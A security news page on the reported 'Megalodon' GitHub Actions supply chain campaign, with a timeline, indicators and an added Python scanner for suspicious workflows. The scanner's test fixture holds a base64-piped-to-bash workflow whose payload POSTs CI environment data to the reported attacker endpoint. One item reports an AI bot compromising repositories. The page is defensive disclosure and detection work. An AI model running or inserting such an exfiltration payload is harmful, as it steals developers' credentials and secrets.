Megalodon GitHub Supply Chain Attack Injected Malicious Actions into 5,561 Repos
Researchers disclosed a large-scale automated supply chain attack dubbed Megalodon that pushed 5,718 malicious commits into 5,561 GitHub repositories in less than six hours, using forged CI/CD bot identities and benign-looking commit messages to slip malicious GitHub Actions workflow files into pull requests. The workflows declared elevated permissions and carried base64-encoded bash payloads that ran once maintainers merged the changes, harvesting CI/CD environment data, cloud credentials, SSH keys, Docker and Kubernetes secrets, Vault and Terraform credentials, GitHub OIDC tokens, and other source-code and developer secrets. Investigators said the stolen data was exfiltrated over HTTP POST requests to 216.126.225[.]129:8443; two workflow variants were observed, with payloads labeled SysDiag and Optimize-Build.
The most visible downstream impact was a compromise of the Tiledesk repository, where a malicious workflow change led to the publication of poisoned @tiledesk/tiledesk-server npm versions 2.18.6 through 2.18.12. Reporting tied the activity to a broader pattern of software supply chain abuse associated with TeamPCP, whose earlier incidents affected major open-source and commercial projects and prompted npm to invalidate some write-capable granular access tokens that could bypass 2FA protections. Security firms urged organizations to review repositories for unauthorized workflow changes, block the identified command-and-control infrastructure, rotate exposed secrets and keys, and inspect cloud and CI logs for signs of credential theft or cloud impersonation.
How this story unfolded
7 events from the most recent confirmed update back to the earliest known activity.
Additional Megalodon victims Black-Iron-Project and WISE-Community identified
StepSecurity reported that Black-Iron-Project and WISE-Community were among the confirmed repositories compromised in the Megalodon campaign, expanding the list of specifically named victims beyond Tiledesk. The report placed these victim disclosures in the context of the May 18 mass GitHub Actions workflow compromise affecting 5,561 repositories.
Researchers identify malicious Polymarket-themed npm packages tied to same activity
SafeDep separately identified a throwaway npm publisher, polymarketdev, that uploaded nine malicious Polymarket-themed packages intended to trick users into submitting Ethereum or Polygon private keys to a Cloudflare Worker endpoint. The packages were reported in coverage of the broader Megalodon and related supply chain activity.
SafeDep discloses Megalodon campaign and links it to widespread repo abuse
By 2026-05-21, SafeDep had publicly reported the Megalodon campaign, stating that thousands of repositories were affected and detailing the malicious workflow techniques and credential theft behavior. Reporting also connected the activity to a broader software supply chain abuse wave associated with TeamPCP.
Tiledesk repository compromise leads to poisoned npm package releases
As a downstream impact of the GitHub compromises, a malicious workflow change in the Tiledesk repository resulted in the maintainer publishing compromised @tiledesk/tiledesk-server npm versions 2.18.6 through 2.18.12. SafeDep identified the embedded payload in the Tiledesk package and linked it to the broader Megalodon campaign.
Malicious workflows steal CI/CD and cloud secrets via Megalodon payloads
The implanted GitHub Actions workflows deployed base64-encoded bash payloads that harvested CI environment data, cloud credentials, SSH keys, Docker and Kubernetes secrets, Vault and Terraform credentials, GitHub OIDC tokens, and other source-code-related secrets. Researchers said the stolen data was exfiltrated to 216.126.225[.]129:8443, including via HTTP POST requests carrying the parameter string "megalodon".
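The review step the disclosures call for, checking workflow files for the indicators described above and in the summary, as an added example for this page; it is not code from StepSecurity, SafeDep, or any other source listed here. It needs only the Python standard library. The two workflow texts and the decoded payload are constructed test fixtures, not captured samples; the only indicators taken from the reporting are the endpoint 216.126.225[.]129:8443 and the string "megalodon". The permission and base64-pipe heuristics are generic and will also flag legitimate workflows that happen to use them, so treat findings as review prompts rather than verdicts.

```python
"""Heuristic scan of GitHub Actions workflow text for Megalodon-style indicators.

Added example for this page; not code from the researchers or vendors cited.
Checks: broad write permissions, base64 blobs decoded straight into a shell,
and (in the visible YAML or inside any decoded blob) uploads to raw IP:port
endpoints, the reported exfiltration endpoint, and the reported marker string.
"""
import base64
import re

# From the reporting: exfiltration endpoint and request marker. Defanged in
# prose as 216.126.225[.]129:8443; the literal form is what a payload would use.
KNOWN_C2 = {"216.126.225.129:8443"}
KNOWN_MARKERS = {"megalodon"}

RE_WRITE_ALL = re.compile(r"^\s*permissions:\s*write-all\s*$", re.M)
RE_SCOPED_WRITE = re.compile(
    r"^\s*(id-token|contents|packages|actions|pull-requests|security-events)\s*:\s*write\s*$", re.M)
RE_B64_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode)\b[^|\n]*\|\s*(?:ba)?sh\b")
# 60+ chars so 40-hex commit SHA pins (actions/foo@<sha>) are not mistaken for payloads.
RE_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")
RE_RAW_IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?")
RE_HTTP_UPLOAD = re.compile(
    r"\b(?:curl|wget)\b[^\n]*?(?:-X\s*POST|--data|--upload-file|--post-(?:data|file)|\s-d\s|\s-F\s)")


def decode_blobs(text):
    """Return the decoded text of every long base64 run that is mostly printable."""
    out = []
    for m in RE_B64_BLOB.finditer(text):
        blob = m.group(0)
        blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:
            continue
        txt = raw.decode("utf-8", errors="replace")
        printable = sum(c.isprintable() or c in "\n\t" for c in txt)
        if txt and printable / len(txt) > 0.9:
            out.append(txt)
    return out


def scan_workflow(text):
    """Return (code, detail) findings for one workflow file's contents."""
    findings = []
    if RE_WRITE_ALL.search(text):
        findings.append(("broad-permissions", "permissions: write-all"))
    for m in RE_SCOPED_WRITE.finditer(text):
        findings.append(("broad-permissions", f"{m.group(1)}: write"))
    m = RE_B64_TO_SHELL.search(text)
    if m:
        findings.append(("b64-pipe-to-shell", m.group(0)))
    # Network indicators are checked in the YAML itself and in each decoded blob,
    # because an encoded payload only reveals its endpoint after decoding.
    sources = [("workflow", text)] + [("decoded-blob", d) for d in decode_blobs(text)]
    for label, body in sources:
        for line in body.splitlines():
            ip = RE_RAW_IP_URL.search(line)
            if ip:
                endpoint = ip.group(1) + (f":{ip.group(2)}" if ip.group(2) else "")
                if endpoint in KNOWN_C2:
                    findings.append(("known-c2", f"{label}: {endpoint}"))
                if RE_HTTP_UPLOAD.search(line):
                    findings.append(("raw-ip-post", f"{label}: {line.strip()}"))
            for marker in KNOWN_MARKERS:
                if marker in line.lower():
                    findings.append(("known-marker", f"{label}: {marker}"))
    return findings


# Constructed test fixtures (not captured samples). The payload mirrors what the
# reporting describes: collect CI environment data and POST it to the reported endpoint.
CONSTRUCTED_PAYLOAD = (
    "env > /tmp/ci_env.txt\n"
    "curl -s -X POST --data-binary @/tmp/ci_env.txt 'http://216.126.225.129:8443/?megalodon'\n"
)
MALICIOUS_WORKFLOW = f"""\
name: CI diagnostics
on:
  push:
    branches: [main]
permissions: write-all
jobs:
  diag:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Collect diagnostics
        run: echo {base64.b64encode(CONSTRUCTED_PAYLOAD.encode()).decode()} | base64 -d | bash
"""
BENIGN_WORKFLOW = """\
name: CI
on: [push]
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""

if __name__ == "__main__":
    for name, wf in (("malicious", MALICIOUS_WORKFLOW), ("benign", BENIGN_WORKFLOW)):
        print(name, scan_workflow(wf) or "no findings")
```

Run it over every file under .github/workflows in the commits you are reviewing, or over the diff of any pull request authored by an account you do not recognise. Decoding the blobs matters more than the regexes on the visible YAML: a workflow that looks like a harmless diagnostics step only exposes its endpoint after the base64 layer is removed.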
Megalodon campaign compromises thousands of GitHub repositories
On 2026-05-18, an automated supply chain attack dubbed Megalodon pushed 5,718 malicious commits into 5,561 GitHub repositories within roughly six hours. The commits used fake CI/CD bot-style identities and inserted malicious GitHub Actions workflow files designed to run after merges or remain dormant for later activation.
Claude-powered AI bot compromises five GitHub repositories
A separate supply chain incident reportedly involved a Claude-powered AI bot compromising five major GitHub repositories. This predates the May 2026 Megalodon campaign and represents a distinct repository compromise event.
Sources
12 references tracked.
Megalodon GitHub Supply Chain Attack Hits 5,500+ Repos (thecyberexpress.com)
SecPod | Prevent Cyberattacks (secpod.com)
Automated 'Megalodon' Campaign Spreads GitHub Repo Backdoors (bankinfosecurity.com)
Automated 'Megalodon' Campaign Spreads GitHub Repo Backdoors (govinfosecurity.com)
Megalodon chums the waters in 5.5K+ GitHub repo poisonings (theregister.com)
Megalodon: Mass GitHub Actions Secret Exfiltration Across 5,500+ Public Repositories (stepsecurity.io)
Megalodon: CI/CD Malware Spreading Across GitHub Repositories (ox.security)
AI bot compromises five major GitHub repositories (cybernews.com)